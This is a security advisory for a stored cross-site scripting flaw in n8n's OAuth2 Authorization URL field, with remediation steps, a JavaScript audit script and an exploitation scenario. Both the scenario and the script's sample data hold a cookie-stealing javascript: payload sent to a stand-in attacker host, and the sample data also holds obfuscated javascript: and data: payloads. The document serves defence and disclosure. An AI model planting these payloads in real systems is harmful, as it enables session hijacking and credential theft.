GHSA-364x-8g5j-x2pr: n8n: stored XSS via malicious OAuth2 Authorization URL

GHSA-364x-8g5j-x2pr MEDIUM
Published March 27, 2026
CISO Take

Any organization running n8n as an AI agent orchestration layer should treat this as urgent: a malicious insider or compromised account with credential-creation rights can plant a stored XSS payload that fires when a target admin interacts with OAuth, potentially handing over full session control and all connected API keys (OpenAI, Slack, databases). Upgrade to 2.8.0+ or 2.6.4+ immediately; until then, restrict credential creation to a minimal list of fully trusted users and audit existing OAuth2 credentials for javascript: scheme URLs.

What is the risk?

The nominal CVSS of 5.4 (medium) understates real-world risk in AI-heavy environments. n8n instances typically hold credentials for dozens of upstream services (LLM APIs, vector databases, data warehouses), so a session takeover is disproportionately damaging. Exploitation is trivial once the attacker holds any account that can create and share credentials; no AI/ML knowledge is required, and the victim only has to open the shared credential and click its authorization button. Insider threat and credential-sharing abuse are realistic vectors, so organizations with large n8n deployments shared across teams face the highest exposure.

What systems are affected?

Package: n8n
Ecosystem: npm
Vulnerable range: >= 2.7.0, < 2.8.0
Patched: 2.8.0 (the advisory also names 2.6.4 as a fixed release for the 2.6 line)

If you run n8n in the vulnerable range you are affected. Because the fix also shipped as 2.6.4, 2.6.x deployments should move to 2.6.4 or later rather than assuming they are out of scope.

How severe is it?

CVSS 3.1: 5.4 / 10
EPSS: N/A
Exploitation status: no known exploitation
Sophistication: trivial

What is the attack surface?

Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None

What should I do?

5 steps
  1. PATCH

    Upgrade to n8n 2.8.0 or 2.6.4 immediately—these versions sanitize the Authorization URL field.

  2. AUDIT

    Review every existing OAuth2 credential for an Authorization URL (and token URL) that does not use an http(s) scheme: javascript:, data:, vbscript: and obfuscated variants such as mixed case or embedded tab characters. Revoke any suspicious credential. Note that n8n stores credential data encrypted at rest, so grepping the database or a SQL LIKE on the credentials table will not find the payload; audit a decrypted export instead (for example the output of the n8n CLI's export:credentials --all --decrypted) and treat that export as secret material.

  3. RESTRICT

    Tighten credential creation and sharing permissions to the minimum necessary set of users until patched.

  4. DETECT

    Add WAF rules or log-based alerts for javascript:, data: or vbscript: schemes (after whitespace and case normalization) in requests to n8n credential endpoints. Request bodies to those endpoints carry plaintext secrets, so alert on the match without persisting full bodies.

  5. SCOPE

    Inventory all API keys and tokens stored in n8n; rotate any that may have been exposed if exploitation cannot be ruled out.
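The audit in step 2 and the scheme check behind step 4, written out as an added example; this is not n8n's own code and is not taken from the advisory. It assumes the decrypted export is a JSON array of credential objects with `id`, `name`, `type` and `data` keys, and that n8n's OAuth2 credential type stores the Authorization URL as `data.authUrl` and the token endpoint as `data.accessTokenUrl`; confirm those field names against your own export before trusting the findings. The sample export embedded in the block is constructed. Node's WHATWG `URL` parser is used on purpose: it applies the same normalization a browser applies before deciding a link's scheme, so an allowlist on `protocol` catches `  JAVA\tscript:` and similar obfuscation that a naive `startsWith('javascript:')` check misses.

```javascript
'use strict';

// Schemes an OAuth2 authorization or token endpoint may legitimately use.
// An allowlist, not a denylist: anything else (javascript:, data:, vbscript:,
// blob:, relative paths, malformed input) is reported.
const ALLOWED_SCHEMES = new Set(['https:', 'http:']);

// Classify a URL the way a browser will interpret it when the client follows it.
// The WHATWG URL parser (Node's global URL, same algorithm as browsers) strips
// leading/trailing whitespace and C0 controls, deletes tab/newline characters
// anywhere in the input and lowercases the scheme, so "  JAVA\tscript:alert(1)"
// still parses with protocol "javascript:". Relative URLs throw because no base
// is supplied, which is correct: an OAuth authorization endpoint must be absolute.
function classifyUrl(raw) {
  if (typeof raw !== 'string' || raw.trim() === '') {
    return { safe: false, scheme: null, reason: 'empty or non-string URL' };
  }
  let parsed;
  try {
    parsed = new URL(raw);
  } catch (_err) {
    return { safe: false, scheme: null, reason: 'not an absolute URL' };
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) {
    return { safe: false, scheme: parsed.protocol, reason: `disallowed scheme ${parsed.protocol}` };
  }
  return { safe: true, scheme: parsed.protocol, reason: null };
}

// Credential fields treated as navigable URLs. Assumption: n8n's oAuth2Api
// credential type uses these property names.
const URL_FIELDS = ['authUrl', 'accessTokenUrl'];

// Return one finding per unsafe URL field across all OAuth2-style credentials.
function auditCredentialExport(credentials) {
  const findings = [];
  for (const cred of credentials) {
    // Generic and service-specific OAuth2 types (oAuth2Api, slackOAuth2Api, ...)
    if (!/oauth2/i.test(String(cred.type || ''))) continue;
    const data = cred.data || {};
    for (const field of URL_FIELDS) {
      if (!(field in data)) continue;
      const verdict = classifyUrl(data[field]);
      if (!verdict.safe) {
        findings.push({ id: cred.id, name: cred.name, field, value: data[field], reason: verdict.reason });
      }
    }
  }
  return findings;
}

// Constructed sample export in the assumed shape; not real n8n data.
const SAMPLE_EXPORT = [
  { id: '1', name: 'Slack (legit)', type: 'slackOAuth2Api',
    data: { authUrl: 'https://slack.com/oauth/v2/authorize',
            accessTokenUrl: 'https://slack.com/api/oauth.v2.access' } },
  { id: '2', name: 'Slack Integration (Prod)', type: 'oAuth2Api', // the advisory's pattern
    data: { authUrl: "javascript:fetch('https://c2.attacker.io/x?s='+document.cookie)",
            accessTokenUrl: 'https://slack.com/api/oauth.v2.access' } },
  { id: '3', name: 'Obfuscated scheme', type: 'oAuth2Api',
    data: { authUrl: '  JAVA\tscript:alert(document.domain)',
            accessTokenUrl: 'https://example.com/token' } },
  { id: '4', name: 'data: URL in token endpoint', type: 'oAuth2Api',
    data: { authUrl: 'https://example.com/authorize',
            accessTokenUrl: 'data:text/html,<script>alert(1)</script>' } },
  { id: '5', name: 'Relative URL', type: 'oAuth2Api',
    data: { authUrl: '/oauth/authorize', accessTokenUrl: 'https://example.com/token' } },
  { id: '6', name: 'OpenAI key (not OAuth2, skipped)', type: 'openAiApi',
    data: { apiKey: 'sk-constructed' } },
];

// Stand-alone run: print findings for the embedded sample.
for (const f of auditCredentialExport(SAMPLE_EXPORT)) {
  console.log(`credential ${f.id} "${f.name}" ${f.field}: ${f.reason}`);
}
```

To run it against a real instance, parse the decrypted export file into an array and pass it to `auditCredentialExport` in place of `SAMPLE_EXPORT`; the same `classifyUrl` can back the log-based alert in step 4, where it should be applied to the normalized URL value rather than to a raw substring search of the request body. The allowlist also flags plain http: only if you drop it from `ALLOWED_SCHEMES`, which is worth doing anywhere an OAuth flow must not leave TLS.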

How is it classified?

Which compliance frameworks are affected?

This advisory is relevant to:

EU AI Act
Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
6.1.2 - AI Risk Assessment 8.4 - AI System Operation A.10.2 - AI system operational controls — input/output management A.6.2 - Roles and responsibilities for AI risk
NIST AI RMF
GOVERN 6.1 - Policies for vulnerability and incident response MANAGE 2.4 - Residual risks are managed MANAGE-2.2 - Mechanisms to respond to harmful AI incidents
OWASP LLM Top 10
LLM05:2025 - Improper Output Handling LLM07:2025 - System Prompt Leakage LLM08:2025 - Excessive Agency

Frequently Asked Questions

What is GHSA-364x-8g5j-x2pr?

A stored cross-site scripting vulnerability in n8n, fixed in 2.8.0 and 2.6.4. An authenticated user who can create and share credentials can place a javascript: URL in the Authorization URL field of an OAuth2 credential; when another user opens that credential and clicks the OAuth authorization button, the script runs in their browser session. See the CISO Take above for why this matters more in AI orchestration deployments.

Is GHSA-364x-8g5j-x2pr actively exploited?

No confirmed active exploitation of GHSA-364x-8g5j-x2pr has been reported, but organizations should still patch proactively.

How to fix GHSA-364x-8g5j-x2pr?

Upgrade to n8n 2.8.0 or 2.6.4 (or later). Until you can, restrict credential creation and sharing to trusted users, audit existing OAuth2 credentials for non-http(s) Authorization URLs in a decrypted export, alert on such schemes at the credential endpoints, and rotate any stored API keys or tokens if exploitation cannot be ruled out. The five steps under "What should I do?" above give the details.

What systems are affected by GHSA-364x-8g5j-x2pr?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI automation pipelines, workflow orchestration, LLM API integration layers.

What is the CVSS score for GHSA-364x-8g5j-x2pr?

GHSA-364x-8g5j-x2pr has a CVSS v3.1 base score of 5.4 (MEDIUM).

What is the AI security impact?

Affected AI Architectures

agent frameworks; AI automation pipelines; workflow orchestration; LLM API integration layers

MITRE ATLAS Techniques

AML.T0011.003 Malicious Link
AML.T0012 Valid Accounts
AML.T0049 Exploit Public-Facing Application
AML.T0053 AI Agent Tool Invocation
AML.T0055 Unsecured Credentials
AML.T0081 Modify AI Agent Configuration
AML.T0083 Credentials from AI Agent Configuration

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: 6.1.2, 8.4, A.10.2, A.6.2
NIST AI RMF: GOVERN 6.1, MANAGE 2.4, MANAGE-2.2
OWASP LLM Top 10: LLM05:2025, LLM07:2025, LLM08:2025

What are the technical details?

Original Advisory

## Impact

An authenticated user with permission to create and share credentials could craft a malicious OAuth2 credential containing a JavaScript URL in the Authorization URL field. If a victim opened the credential and interacted with the OAuth authorization button, the injected script would execute in their browser session.

## Patches

The issue has been fixed in n8n versions 2.8.0 and 2.6.4. Users should upgrade to one of these versions or later to remediate the vulnerability.

## Workarounds

If upgrading is not immediately possible, administrators should consider the following temporary mitigations:

- Limit credential creation and sharing permissions to fully trusted users only.
- Restrict access to the n8n instance to trusted users only.

These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.

Exploitation Scenario

A disgruntled team member or an attacker who has compromised a low-privilege n8n account (for example a developer account) creates an OAuth2 credential with an innocuous name such as 'Slack Integration (Prod)'. In the Authorization URL field they enter: javascript:fetch('https://c2.attacker.io/x?s='+document.cookie). They share this credential with a target admin. The admin, seeing a familiar-looking credential, opens it and clicks the 'Connect' or 'Authorize' button to verify or update it. The injected script executes in the admin's browser session. If the session cookie is not HttpOnly, document.cookie hands it to the attacker's C2 and the attacker replays it; if it is HttpOnly, the script cannot read it but can still issue authenticated requests to the n8n REST API from the admin's browser, which is the more realistic payload. Either way the attacker ends up with admin-level access to n8n and its stored credentials, including OpenAI API keys, database connection strings and downstream service tokens.

Weaknesses (CWE)

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the HTML body, element attributes (such as src="XYZ"), URIs, JavaScript sections, Cascading Style Sheets, etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Timeline

Published
March 27, 2026
Last Modified
March 27, 2026
First Seen
March 27, 2026
